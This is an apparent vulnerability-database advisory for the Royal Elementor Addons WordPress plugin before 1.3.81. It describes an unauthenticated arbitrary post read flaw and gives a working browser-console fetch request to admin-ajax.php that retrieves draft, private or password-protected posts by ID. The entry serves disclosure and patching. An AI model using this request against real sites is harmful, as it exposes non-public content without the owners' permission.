Lucene search

K
wpexploitKrzysztof Zając (CERT PL)WPEX-ID:DEBD8498-5770-4270-9EE1-1503E675EF34
HistoryDec 06, 2023 - 12:00 a.m.

Royal Elementor Addons and Templates < 1.3.81 - Unauthenticated Arbitrary Post Read

2023-12-0600:00:00
Krzysztof Zając (CERT PL)
48
woocommerce
unauthenticated access
draft posts

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

47.2%

Description The plugin does not ensure that users accessing posts via an AJAX action (and REST endpoint, currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content

WooCommerce needs to be installed and activated. Then, run the below command in the developer console of the web browser while being on the blog as unauthenticated user (4 being the ID of a Draft, Private or Password protected post)

(await fetch("/wp-admin/admin-ajax.php?action=wpr_get_page_content", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "wpr_compare_page_id=4",
  "method": "POST",
})).text();

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

47.2%

Related for WPEX-ID:DEBD8498-5770-4270-9EE1-1503E675EF34